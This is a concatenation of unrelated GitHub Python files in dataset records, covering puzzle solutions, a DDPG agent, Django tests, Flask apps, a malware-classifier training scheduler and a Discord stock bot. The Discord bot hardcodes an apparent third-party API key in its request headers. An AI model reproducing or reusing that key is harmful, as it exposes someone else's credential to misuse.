print(\"Keyed:\", original)\n\ndecrypted = []\nfor i in range(0, size):\n 
decrypted.append({ \"value\" : original[i], \"position\" : i })\n\nfor c in range(0, NUMBER_OF_CYCLES):\n for i in range(0, size):\n for k in range(0, size):\n if decrypted[k][\"position\"] == i:\n v = decrypted[k][\"value\"] \n if v != 0: # if 0, don't move\n move(decrypted, k, v)\n if DEBUG:\n print(\"Move:\", v, \":\", [d[\"value\"] for d in decrypted])\n break\n\nresult = [d[\"value\"] for d in decrypted]\n\nat = result.index(0)\nx = result[(at + 1000) % size]\ny = result[(at + 2000) % size]\nz = result[(at + 3000) % size]\n\nif DEBUG:\n print(\"Result: \", result)\n\nprint(\"Coordinates: 0 at [\", at, \"],\", x, \"at [\", (at + 1000) % size, \"],\", y, \"at [\", (at + 2000) % size, \"],\", z, \"at [\", (at + 3000) % size, \"]\")\nsum = x + y + z\nprint(\"sum =\", sum)\n","repo_name":"jambolo/advent_of_code_2022","sub_path":"day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23506194089","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\nnumbers = list(map(int, input().split()))\nmath = list(map(int, input().split()))\n\nmaxi = -1000000000\nmini = 1000000000\n\ndef cal(num, i, add, minus, mul, div):\n global maxi, mini, numbers\n if i == n:\n maxi = max(maxi, num)\n mini = min(mini, num)\n return\n else:\n if add:\n cal(num + numbers[i], i+1, add-1, minus, mul, div)\n if minus:\n cal(num - numbers[i], i+1, add, minus-1, mul, div)\n if mul:\n cal(num * numbers[i], i+1, add, minus, mul-1, div)\n if div:\n cal(int(num / numbers[i]), i+1, add, minus, mul, div-1)\n\ncal(numbers[0], 1, math[0], math[1], math[2], math[3])\nprint(maxi)\nprint(mini)\n\n","repo_name":"nkrang/Algorithm-Study","sub_path":"202109/B-14888/연산자_끼워넣기.py","file_name":"연산자_끼워넣기.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73790786611","text":"\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam\n\nfrom RL_model import (Actor, Critic)\nfrom memory import SequentialMemory\nfrom random_process import OrnsteinUhlenbeckProcess\nfrom util import *\n\n\ncriterion = nn.MSELoss()\n\nclass DDPG(object):\n def __init__(self, nb_states, nb_actions, args):\n \n if args.seed > 0:\n self.seed(args.seed)\n\n self.nb_states = nb_states\n self.nb_actions= nb_actions\n \n # Create Actor and Critic Network\n self.hidden = args.hidden\n self.actor = Actor(self.nb_states//args.batch_size, self.nb_actions, args.hidden)\n self.actor_target = Actor(self.nb_states//args.batch_size, self.nb_actions, args.hidden)\n self.actor_optim = Adam(self.actor.parameters(), lr=1e-5)\n\n self.critic = Critic(self.nb_states, self.nb_actions, args.hidden)\n self.critic_target = Critic(self.nb_states, self.nb_actions, args.hidden)\n self.critic_optim = Adam(self.critic.parameters(), lr=1e-5)\n\n hard_update(self.actor_target, self.actor) # Make sure target is with the same weight\n hard_update(self.critic_target, self.critic)\n \n # Create replay buffer\n self.memory = SequentialMemory(limit=args.rmsize, window_length=args.window_length)\n self.random_process = OrnsteinUhlenbeckProcess(size=nb_actions, theta=args.ou_theta, mu=args.ou_mu, sigma=args.ou_sigma)\n\n # Hyper-parameters\n self.batch_size = args.batch_size\n self.tau = args.tau\n self.discount = args.discount\n self.depsilon = 1.0 / args.epsilon\n self.max_lr = 1e-1\n self.min_lr = 1e-6\n\n # \n self.epsilon = 
1.0\n self.s_t = None # Most recent state\n self.a_t = None # Most recent action\n self.is_training = True\n\n # \n if USE_CUDA: self.cuda()\n\n def update_policy(self):\n # Sample batch\n state_batch, action_batch, reward_batch, next_state_batch, terminal_batch = self.memory.sample_and_split(self.batch_size)\n\n # Prepare for the target q batch\n\n s_t = to_tensor(next_state_batch, volatile=True).unsqueeze(-1)\n h0 = Variable(torch.randn(2, s_t.shape[0], self.hidden)).cuda()\n c0 = Variable(torch.randn(2, s_t.shape[0], self.hidden)).cuda()\n next_q_values = self.critic_target([\n to_tensor(next_state_batch, volatile=True),\n self.actor_target(s_t, (h0, c0)),\n ])\n \n target_q_batch = to_tensor(reward_batch) + self.discount*to_tensor(terminal_batch.astype(np.float))*next_q_values\n\n # Critic update\n self.critic.zero_grad()\n\n q_batch = self.critic([to_tensor(state_batch), to_tensor(action_batch)])\n \n value_loss = criterion(q_batch, target_q_batch)\n value_loss.backward()\n self.critic_optim.step()\n\n # Actor update\n self.actor.zero_grad()\n\n s_t = to_tensor(state_batch, volatile=True).unsqueeze(-1)\n h0 = Variable(torch.randn(2, s_t.shape[0], self.hidden)).cuda()\n c0 = Variable(torch.randn(2, s_t.shape[0], self.hidden)).cuda()\n policy_loss = -self.critic([\n to_tensor(state_batch),\n self.actor(s_t, (h0, c0))\n ])\n\n policy_loss = policy_loss.mean()\n policy_loss.backward()\n self.actor_optim.step()\n\n # Target update\n soft_update(self.actor_target, self.actor, self.tau)\n soft_update(self.critic_target, self.critic, self.tau)\n\n\n def cuda(self):\n self.actor.cuda()\n self.actor_target.cuda()\n self.critic.cuda()\n self.critic_target.cuda()\n\n def observe(self, r_t, s_t1, done):\n if self.is_training:\n self.memory.append(self.s_t, self.a_t, r_t, done)\n self.s_t = s_t1\n\n def random_action(self):\n action = np.random.uniform(self.min_lr, self.max_lr, self.nb_actions)\n self.a_t = action\n return action\n\n def select_action(self, s_t, decay_epsilon=True):\n s_t = to_tensor(np.array(s_t)).unsqueeze(0).unsqueeze(-1)\n h0 = Variable(torch.randn(2, 1, self.hidden)).cuda()\n c0 = Variable(torch.randn(2, 1, self.hidden)).cuda()\n action = to_numpy(self.actor(s_t, (h0, c0)))\n action += self.is_training*max(self.epsilon, 0)*self.random_process.sample()\n action = np.clip(action, self.min_lr, self.max_lr)\n if decay_epsilon:\n self.epsilon -= self.depsilon\n \n self.a_t = action\n return action\n\n def reset(self, obs):\n self.s_t = obs\n self.random_process.reset_states()\n ","repo_name":"RingBDStack/ICL-Incremental-InfoNCE","sub_path":"ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"6456159105","text":"from django.test import TestCase\r\nfrom django.contrib.auth.models import User\r\nfrom .models import Thread, Message\r\n\r\n\r\nclass ThreadTestCase(TestCase):\r\n def setUp(self):\r\n self.user1 = User.objects.create_user('juan',None,'123456')\r\n self.user2 = User.objects.create_user('jose',None,'123456')\r\n self.user3 = User.objects.create_user('carlos',None,'123456')\r\n self.thread = Thread.objects.create()\r\n def test_add_users_to_thread(self):\r\n self.thread.users.add(self.user1,self.user2)\r\n self.assertEqual(len(self.thread.users.all()), 2)\r\n def test_filter_thread_by_users(self):\r\n self.thread.users.add(self.user1,self.user2)\r\n threads = Thread.objects.filter(users=self.user1).filter(users=self.user2)\r\n 
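+# hard_update/soft_update are pulled in via 'from util import *' in the DDPG
+# record above but util is not part of this dump; a sketch of the conventional
+# Polyak-averaging definitions they are assumed to follow:
+def hard_update(target, source):
+    for t, s in zip(target.parameters(), source.parameters()):
+        t.data.copy_(s.data)                   # exact copy of the online weights
+
+def soft_update(target, source, tau):
+    # target <- tau * source + (1 - tau) * target, applied parameter-wise
+    for t, s in zip(target.parameters(), source.parameters()):
+        t.data.copy_(t.data * (1.0 - tau) + s.data * tau)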
self.assertEqual(self.thread, threads[0])\r\n def test_add_messages_to_thread(self):\r\n self.thread.users.add(self.user1, self.user2)\r\n message1 = Message.objects.create(user=self.user1, content=\"Hola\")\r\n message2 = Message.objects.create(user=self.user2, content=\"Hola\")\r\n self.thread.messages.add(message1, message2)\r\n self.assertEqual(len(self.thread.messages.all()),2)\r\n for message in self.thread.messages.all():\r\n print(\"({}): {}\".format(message.user, message.content))\r\n def test_add_message_from_user_not_in_thread(self):\r\n self.thread.users.add(self.user1, self.user2)\r\n message1 = Message.objects.create(user=self.user1, content=\"Hola\")\r\n message2 = Message.objects.create(user=self.user2, content=\"Hola\")\r\n message3 = Message.objects.create(user=self.user3, content=\"Tercer usuario\")\r\n self.thread.messages.add(message1,message2,message3)\r\n self.assertEqual(len(self.thread.messages.all()),2)\r\n # def test_find_thread_with_custom_manager(self):\r\n # self.thread.users.add(self.user1, self.user2)\r\n # thread = Thread.objects.find(self.user1,self.user2)\r\n # self.assertEqual(self.thread, thread)\r\n","repo_name":"valdivieso01/itmanager","sub_path":"messenger/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15087903645","text":"\"\"\"\nDVC Stage interpolate-outliers - interpolates outliers\n\"\"\"\n\n# pylint: disable=E0401\n\nimport numpy as np\nimport pandas as pd\nimport settings.settings as settings\nimport data_preprocessing.columns_filter as col_filters\n\n\ndef __get_quantiles(df: pd.DataFrame, column: str, iqr_coef_lower=1.5\n , iqr_coef_upper=1.5):\n q1 = df[column].quantile(0.25)\n q3 = df[column].quantile(0.75)\n iqr = q3 - q1\n lower = q1 - iqr_coef_lower * iqr\n upper = q3 + iqr_coef_upper * iqr\n return lower, upper\n\n\ndef __get_outlier_indices(df: pd.DataFrame, column: str, lower: float,\n upper: float):\n upper_array = df[df[column] >= upper].index\n lower_array = df[df[column] <= lower].index\n return lower_array, upper_array\n\n\ndef interpolate_outliers_for_pollutant(df: pd.DataFrame, column: str,\n iqr_coef_lower=1.5,\n iqr_coef_upper=1.5\n ):\n \"\"\"\n Interpolates outliers in the dataframe for the required column\n @param iqr_coef_lower: Coefficient for lower iqr interval\n @param iqr_coef_upper: Coefficient for upper iqr interval\n @param df: Dataframe for interpolation outliers\n @param column: Column name\n \"\"\"\n lower, upper = __get_quantiles(df, column, iqr_coef_lower, iqr_coef_upper)\n lower_array, upper_array = __get_outlier_indices(df, column, lower, upper)\n df.loc[upper_array, column] = np.nan\n df.loc[lower_array, column] = np.nan\n print(f\"Outliers quantity: {df[column].isna().sum()}\")\n df[column] = df[column].interpolate(method='time')\n df[column].fillna(0, inplace=True)\n print(f'DEBUG fillna, column: {column}, sum_na {df[column].isna().sum()}')\n\n\ndef interpolate_outliers(pollutants_codes: [int],\n df_list: list[pd.DataFrame],\n iqr_borders: dict):\n \"\"\"\n Interpolates outliers in target AQI columns.\n @param pollutants_codes: The list of pollutant codes\n @param df_list: List of dataframes per pollutant\n @param iqr_borders: Dictionary per pollutant with 2-value arrays for IQR coefficients\n \"\"\"\n for i in range(len(pollutants_codes)):\n pollutant_id = pollutants_codes[i]\n for pred_value_type in settings.PREDICTION_VALUE_TYPES:\n # column_name = 
col_filters.get_target_column(\n # pred_value_type, pollutant_id)\n iqrs = iqr_borders[pollutant_id]\n interpolate_outliers_for_pollutant(df_list[i],\n pred_value_type,\n iqrs[0], iqrs[1])\n","repo_name":"AlexandraNasonova/air_pollution_predict","sub_path":"airpollpredictor/data_preprocessing/outliers_interpolator.py","file_name":"outliers_interpolator.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71718199093","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n2520 is the smallest number that can be divided by each of the numbers\nfrom 1 to 10 without any remainder.\n\nWhat is the smallest positive number that is evenly divisible\nby all of the numbers from 1 to 20?\n\"\"\"\nnumber = 0\n\nwhile True:\n number += 19\n for divider in range(1, 21):\n if number % divider != 0:\n break\n else:\n break\n\n\nprint(number)\n","repo_name":"citizen-stig/euler","sub_path":"p5s1.py","file_name":"p5s1.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11372475826","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom flask import Flask, render_template, redirect, url_for, session, flash, request\n\nfrom models import db, User, TestOneResult, TestOne, db_init\nfrom config import SECRET_KEY, SQLITE_DATABASE_NAME\n\napp = Flask(__name__, static_url_path='', static_folder='static', template_folder='templates')\n\n\n# SQLAlchimy config\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + SQLITE_DATABASE_NAME\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['SECRET_KEY'] = SECRET_KEY\napp.config['SESSION_COOKIE_NAME'] = \"se_session\"\n\n\n# Init Database\ndb.app = app\ndb.init_app(app)\n\n\n@app.before_request\ndef make_session_permanent():\n session.permanent = True\n\n\n@app.route(\"/\")\ndef index():\n\n if \"username\" not in session:\n username = os.urandom(16).hex()\n\n # Create new user\n u = User(name=username)\n\n try:\n db.session.add(u)\n db.session.commit()\n session[\"username\"] = username\n except:\n print(\"Error while add user to the database\")\n print(u)\n\n return render_template(\"index.html\")\n\n username = session[\"username\"]\n user = User.query.filter_by(name=username).first()\n\n if not user:\n u = User(name=username)\n\n try:\n db.session.add(u)\n db.session.commit()\n session[\"username\"] = username\n except:\n print(\"Error while add user to the database\")\n print(u)\n return render_template(\"error.html\", msg=\"User not found\")\n\n user = User.query.filter_by(name=username).first()\n\n # Do we have answers?\n last_question_id = TestOneResult.query.filter_by(author_id=user.id).count()\n\n return render_template(\"index.html\", last_question_id=last_question_id)\n\n\n@app.route('/index.html')\ndef index_html():\n return redirect(url_for('index'))\n\n\n@app.route('/calculate_result.html')\ndef calculate_result():\n\n if \"username\" not in session:\n return redirect(url_for('index'))\n\n username = session[\"username\"]\n user = User.query.filter_by(name=username).first()\n\n if not user:\n return redirect(url_for('index'))\n\n answers = TestOneResult.query.filter_by(author_id=user.id)\n\n a_count = answers.count()\n\n if a_count < 74:\n flash(\"Вы ответили не на все вопросы\", category='error')\n return redirect(url_for('index'))\n\n groups_count_no = []\n groups_count_yes = []\n res = 0\n res_file = 0\n\n for x in [0, 1, 2, 3]:\n group_no = 
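+# A quick check of the IQR fences used by __get_quantiles above, on illustrative
+# data (lower/upper are the Tukey fences with the default 1.5 coefficients):
+import pandas as pd
+
+s = pd.Series([1.0, 2.0, 2.5, 3.0, 100.0])
+q1, q3 = s.quantile(0.25), s.quantile(0.75)
+iqr = q3 - q1
+lower, upper = q1 - 1.5 * iqr, q3 + 1.5 * iqr
+print(s[(s <= lower) | (s >= upper)])          # flags only the 100.0 outlier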
db.session.query(TestOneResult).join(TestOne).filter(TestOne.type == x)\\\n .filter(TestOneResult.author_id == user.id).filter(TestOneResult.answer < 4)\n\n group_yes = db.session.query(TestOneResult).join(TestOne).filter(TestOne.type == x)\\\n .filter(TestOneResult.author_id == user.id).filter(TestOneResult.answer > 4)\n\n groups_count_no.append(group_no.count())\n groups_count_yes.append(group_yes.count())\n\n if group_no.count() > res:\n res_file = x + 1\n res = group_no.count()\n\n res_file = \"result\" + str(res_file) + \".html\"\n\n #return render_template('result.html', groups_count_no=groups_count_no, groups_count_yes=groups_count_yes)\n return render_template(res_file)\n\n\n@app.route('/question.html', methods=['GET', 'POST'])\ndef get_question():\n\n if \"username\" not in session:\n return redirect(url_for('index'))\n\n username = session[\"username\"]\n user = User.query.filter_by(name=username).first()\n\n if not user:\n return redirect(url_for('index'))\n\n if request.method == \"POST\":\n question_id = request.args.get('question', default=0, type=int)\n answer = request.form.get('q_answer', type=int, default=0)\n\n if (not question_id) or (question_id > 74) or (question_id < 0):\n flash(\"Не указан номер вопроса\", category='error')\n return redirect(url_for('index'))\n\n if (answer <= 0) or (answer > 7):\n flash(\"Указанный ответ неверный\", category='error')\n return redirect(request.url)\n\n # Check if question_id in database\n q = TestOne.query.get(question_id)\n\n if not q:\n flash(\"Такого вопроса нет в базе\", category='error')\n return redirect(url_for('index'))\n\n res = TestOneResult(author_id=user.id, test_one_id=question_id, answer=answer)\n db.session.add(res)\n db.session.commit()\n\n next_q = q.id + 1\n return redirect(url_for(\"get_question\", question=next_q))\n\n # If it's GET\n question_id = request.args.get('question', default=0, type=int)\n\n if question_id:\n\n if question_id > 74:\n return redirect(url_for('calculate_result'))\n\n question = TestOne.query.get(question_id)\n\n if not question:\n flash(\"Такого вопроса нет\", category='error')\n return redirect(url_for('index'))\n\n return render_template(\"question.html\", user=user, question=question)\n\n # Well, no question_id\n # Try to get last user question.\n\n last_question = TestOneResult.query.filter_by(author_id=user.id).order_by(TestOneResult.id.desc()).first()\n\n # First time, get the first question and go\n if not last_question:\n first_question = TestOne.query.get(1)\n\n if not first_question:\n print(\"Database nas no questions\")\n return redirect(url_for('index'))\n\n return render_template(\"question.html\", user=user, question=first_question)\n\n if last_question.test_one_id >= 74:\n return redirect(url_for('calculate_result'))\n\n current_question = TestOne.query.get(last_question.test_one_id+1)\n return render_template(\"question.html\", user=user, question=current_question)\n\n\n@app.route('/result3.html')\ndef result_1():\n return render_template(\"result3.html\")\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) > 1:\n if sys.argv[1] == \"init\":\n db_init()\n\n app.run(port=5000)\n","repo_name":"i1ya/FinBehaivor","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27440386517","text":"from configs import *\nfrom packages import * \n\nimport data \nfrom train import train \nfrom copy import deepcopy \n\nparser = 
argparse.ArgumentParser(description='train file')\nparser.add_argument('--preprocess', type=bool, default=False, help='process training data using specified directory')\nparser.add_argument('--max_lr', type=float, default=1e-2, help='initial learning rate, decay to end_learning_rate with cosine annihilation')\nparser.add_argument('--min_lr', type=float, default=1e-3, help='ending learning rate')\nparser.add_argument('--max_epoch', type=int, default=50, help='maximum epoch for training')\nparser.add_argument('--epoch_samples', type=int, default=5_000, help='samples for each epochs')\nparser.add_argument('--epoch_updates', type=int, default=100, help='allowed updates for each epochs')\nparser.add_argument('--batch_size', type=int, default=1, help='batch size when training')\nparser.add_argument('--fine_tune_last', type=bool, default=False, help='fine tune last model?')\nparser.add_argument('--model_pickle_path', type=str, default='', help='pickled model path, use with scheduler')\nparser.add_argument('--log_path', type=str, default='/home/michael/ssd_cache/SMART/train_logs', help='train logs location')\nparser.add_argument('--task_type', type=str, default='Segmentation', help='Task type in train_log_path folder')\nparser.add_argument('--GPU', type=str, default='0', help='specify which GPU to train on')\nparser.add_argument('--debug', type=bool, default=False, help='set to debug mode')\noptions = parser.parse_args()\n\n\ndef dump_pickle(model, path):\n with open(path, 'wb') as fileout:\n pickle.dump(model, fileout)\n return None \n\n\ndef main():\n\n if 'win' in sys.platform.lower():\n options.log_path = 'Z:/Data/Malware/train_logs'\n else:\n options.log_path = '/home/michael/FreeNAS_Storage/Data/Malware/train_logs'\n \n if options.debug: \n torch.autograd.set_detect_anomaly(True)\n options.max_epoch = 2\n options.epoch_samples = 10\n options.epoch_updates = 10\n options.batch_size = 1\n else:\n warnings.filterwarnings(\"ignore\")\n \n if len(options.GPU) > 1:\n world_size = len(options.GPU.split(','))\n options.DDP = True \n else:\n options.DDP = False\n\n from models.candidate import dual_task, single_task\n to_train = [dual_task]\n \n line_gap = '-' * line_width\n for index, model_class in enumerate(to_train, 1):\n \n option_used = deepcopy(options) \n option_used.schedule = f'[{index}/{len(to_train)}]'\n model = model_class(options=option_used, input_shape=(patch_size, patch_size))\n path = f'Z:/home/michael/SSD_Cache/Malware/schedule/{model.__class__.__name__}.pickle'\n dump_pickle(model, path)\n option_used.model_pickle_path = path \n \n line = f' scheduler on {option_used.schedule} {model.__class__.__name__} '\n print(f'\\n{line_gap}\\n{line:-^{line_width}}\\n{line_gap}\\n')\n \n if option_used.DDP:\n torch.multiprocessing.spawn(train, nprocs=world_size, args=(world_size, option_used))\n else:\n train(option_used.GPU, 0, option_used)\n\n\nif __name__ == '__main__':\n \n if options.preprocess:\n data.make_model_data_on_stack() \n\n main()","repo_name":"Michael-H777/Malware_Classification","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28779616375","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n def getParents(tree, node):\n if not tree:\n return []\n if tree == 
node:\n return [tree]\n if node.val > tree.val:\n return [tree] + getParents(tree.right, node)\n return [tree] + getParents(tree.left, node)\n\n part1 = getParents(root, p)\n part2 = getParents(root, q)\n i = 0\n for i in range(min(len(part1), len(part2))):\n if part1[i] != part2[i]:\n return part2[i - 1]\n return part2[i]\n","repo_name":"MinnanZhou/Leetcode","sub_path":"235.py","file_name":"235.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73411470133","text":"# bot.py\nimport os\nimport pymongo\nimport requests\nimport json\nimport discord\nfrom dotenv import load_dotenv\nintents = discord.Intents.default()\nintents.members = True\nintents.messages = True\n\nload_dotenv() \nclient = discord.Client(intents=intents)\n\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('SERVER')\ndb_url = os.getenv('DB_URL')\nmongoClient = pymongo.MongoClient(db_url)\n\ndef get_new_member(member):\n return {\"_id\" : member.id,\n \"name\" : member.name,\n \"stocks\" : []}\n\ndef get_stock_info(url, headers, querystring):\n try:\n response = requests.get(url, headers=headers, params=querystring)\n return response.json()\n except Exception:\n return None\n\ndef getQuotes(code, time):\n url = \"https://twelve-data1.p.rapidapi.com/quote\"\n timeFrame = time\n querystring = {\"symbol\":code, \"interval\":\"1\" + timeFrame, \"format\":\"json\", \"outputsize\":\"1\"}\n headers = {\n 'x-rapidapi-key': \"76ddaf3224mshda367e947dd4415p1c17f7jsn86cb83e7e8cb\",\n 'x-rapidapi-host': \"twelve-data1.p.rapidapi.com\"\n }\n return get_stock_info(url, headers, querystring)\n \ndef getPrice(code):\n url = \"https://twelve-data1.p.rapidapi.com/price\"\n querystring = {\"symbol\":code, \"outputsize\":\"1\", \"format\":\"json\"}\n headers = {\n 'x-rapidapi-key': \"76ddaf3224mshda367e947dd4415p1c17f7jsn86cb83e7e8cb\",\n 'x-rapidapi-host': \"twelve-data1.p.rapidapi.com\"\n }\n return get_stock_info(url, headers, querystring)\n\n@client.event\nasync def on_member_join(member):\n new_member = get_new_member(member)\n mongoClient.DiscordBotDB.Members.insert_one(new_member)\n try:\n await member.send('Welcome to the Berver ' + member.name)\n except Exception:\n pass\n\n@client.event\nasync def on_member_remove(member):\n mongoClient.DiscordBotDB.Members.delete_one({\"_id\": member.id})\n try:\n await member.send('Sad to see you leave. 
We hope to see you again: ' + member.name)\n    except Exception:\n        pass\n\n@client.event\nasync def on_ready():\n    for guild in client.guilds:\n        if guild.name == GUILD:\n            break\n\n    print(\n        f'{client.user} is connected to the following guild:\\n'\n        f'{guild.name}(id: {guild.id})'\n    )\n    \n    members = '\\n - '.join([member.name for member in guild.members if not member.bot])\n    print(f'Guild Members:\\n - {members}')\n\n    for member in guild.members:\n        if not (mongoClient.DiscordBotDB.Members.find_one({\"_id\": member.id}) or member.bot):\n            new_member = get_new_member(member)\n            mongoClient.DiscordBotDB.Members.insert_one(new_member)\n\n@client.event\nasync def on_message(message):\n    if message.author == client.user:\n        return\n    if message.content.startswith('$stock'):\n        req = message.content.split()\n        if (len(req) < 2):\n            await message.channel.send('all requests must have at least one parameter')\n            return\n        infoType = req[1]\n        stock = req[2].upper() if len(req) > 2 else ''  # guard: commands like my_stocks carry no ticker symbol\n\n        if (infoType == 'price'):\n            price = getPrice(stock)\n            if (price == None):\n                await message.channel.send(\"Could not get price for \" + stock)\n            else:\n                await message.channel.send(stock + \" current price : \" + price[\"price\"])\n\n        elif (infoType == 'data'):\n            if (len(req) != 4):\n                await message.channel.send(\"Stock data requests must contain a third: timeframe parameter\")\n                return\n            time = req[3].lower()\n            if (time == \"day\" or time == \"month\" or time == \"week\"):\n                quote = getQuotes(stock, time)\n                if (quote == None):\n                    await message.channel.send(\"Could not get data for \" + stock)\n                else:\n                    await message.channel.send(\"Stock: \" + quote[\"name\"] + \" (\" + stock + \") \" + \"\\n\"\n                                               \"High: \" + quote[\"high\"] + \"\\n\" +\n                                               \"Low: \" + quote[\"low\"] + \"\\n\" + \n                                               \"Volume: \" + quote[\"volume\"])\n                return\n            await message.channel.send(\"timeframe parameter must be: day, week or month\")\n\n        elif (infoType == 'info'):\n            quote = getQuotes(stock,'day')\n            if (quote == None):\n                await message.channel.send(\"Could not get info for \" + stock)\n            else:\n                await message.channel.send(\"Company: \" + quote[\"name\"] + \"\\n\" + \n                                           \"Exchange: \" + quote[\"exchange\"] + \"\\n\" + \n                                           \"Currency traded in: \" + quote[\"currency\"])\n        elif (infoType == 'add'):\n            stock_list = mongoClient.DiscordBotDB.Members.find_one({\"_id\": message.author.id})[\"stocks\"]\n            if stock in stock_list:\n                await message.channel.send(\"You already have \" + stock + \" in your list of saved stocks\")\n                return\n            price = getPrice(stock)\n            if (price == None):\n                await message.channel.send(\"Could not add stock \" + stock)\n            else:\n                stock_list.append(stock)\n                print(stock_list)\n                mongoClient.DiscordBotDB.Members.find_one_and_update({\"_id\": message.author.id}, {'$set': {'stocks': stock_list}})\n\n        elif (infoType == 'remove'):\n            stock_list = mongoClient.DiscordBotDB.Members.find_one({\"_id\": message.author.id})[\"stocks\"]\n            if not (stock in stock_list):\n                await message.channel.send(stock + \" is not in your saved list of stocks\")\n            else:\n                stock_list.remove(stock)\n                print(stock_list)\n                mongoClient.DiscordBotDB.Members.find_one_and_update({\"_id\": message.author.id}, {'$set': {'stocks': stock_list}})\n        \n        elif (infoType == 'my_stocks'):\n            # This branch previously repeated the 'remove' logic by copy-paste; it now reports the saved list.\n            stock_list = mongoClient.DiscordBotDB.Members.find_one({\"_id\": message.author.id})[\"stocks\"]\n            if not stock_list:\n                await message.channel.send(\"You have no saved stocks\")\n            else:\n                await message.channel.send(\"Your saved stocks: \" + \", \".join(stock_list))\n\n        else:\n            await message.channel.send(infoType + ' is not a valid command')\n\nclient.run(TOKEN)","repo_name":"lawrencecai49/DiscordStockBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
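The add and remove branches in the bot above each fetch the member's stock list, mutate it in Python, and write the whole array back with find_one_and_update. A minimal sketch of the same bookkeeping using MongoDB's atomic array operators, which collapses each read-modify-write into a single server-side update (the helper names are invented here; only pymongo's standard update_one operators are assumed):

def add_stock(members, member_id, stock):
    # $addToSet appends the symbol only if it is not already in the array
    members.update_one({"_id": member_id}, {"$addToSet": {"stocks": stock}})

def remove_stock(members, member_id, stock):
    # $pull deletes every occurrence of the symbol in one server-side step
    members.update_one({"_id": member_id}, {"$pull": {"stocks": stock}})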
{"seq_id":"4963378491","text":"from __future__ import division, print_function\r\nimport os\r\nimport numpy as np\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom flask import Flask, request, render_template\r\nfrom werkzeug.utils import secure_filename\r\n\r\n# define flask app\r\napp = Flask(__name__)\r\n\r\n# model name\r\nMODEL_PATH ='resnet152V2_model.h5'\r\n\r\n# load trained model\r\nmodel = load_model(MODEL_PATH)\r\n\r\ndef model_predict(img_path, model):\r\n    print('Uploaded image path: ',img_path)\r\n    loaded_image = image.load_img(img_path, target_size=(224, 224))\r\n\r\n    # preprocess the image\r\n    loaded_image_in_array = image.img_to_array(loaded_image)\r\n\r\n    # normalize\r\n    loaded_image_in_array=loaded_image_in_array/255\r\n\r\n    # add additional dim such as to match input dim of the model architecture\r\n    x = np.expand_dims(loaded_image_in_array, axis=0)\r\n\r\n    # prediction\r\n    prediction = model.predict(x)\r\n\r\n    results=np.argmax(prediction, axis=1)\r\n\r\n    if results==0:\r\n        results=\"This is a diseased cotton leaf\"\r\n    elif results==1:\r\n        results=\"This is a diseased cotton plant\"\r\n    elif results==2:\r\n        results=\"This is a fresh cotton leaf\"\r\n    else:\r\n        results=\"This is a fresh cotton plant\"\r\n\r\n    return results\r\n\r\n@app.route('/', methods=['GET'])\r\ndef index():\r\n    return render_template('index.html')\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef upload():\r\n    if request.method == 'POST':\r\n        # Get the file from post request\r\n        f = request.files['file']\r\n\r\n        # Save the file to ./uploads\r\n        basepath = os.path.dirname(__file__)\r\n        file_path = os.path.join(\r\n            basepath, 'uploads', secure_filename(f.filename))\r\n        f.save(file_path)\r\n\r\n        # Make prediction\r\n        preds = model_predict(file_path, model)\r\n        result=preds\r\n        return result\r\n    return None\r\n\r\nif __name__ == '__main__':\r\n    app.run(port=5001,debug=True)\r\n","repo_name":"Akshaykumarcp/cotton-plant-disease-prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}{"seq_id":"187939848","text":"import numpy as np\r\nimport scipy as sp\r\nimport scipy.signal\r\n\r\nfrom _lib.analyzer import BaseAnalyzer, group, field\r\n\r\n\r\nclass Analyzer (BaseAnalyzer):\r\n    # automatically define the default group (empty string group) at first\r\n\r\n    # the sample rate of input signals\r\n    sample_rate = field.float_('Sample rate')\r\n    # the number of channels\r\n    channels = field.int_('Channels')\r\n    # the length of input signals\r\n    window_size = field.int_('Window size')\r\n    # the length of the interval between signal clippings\r\n    frame_step = field.int_('Frame step')\r\n\r\n    # define group (in the global scope)\r\n  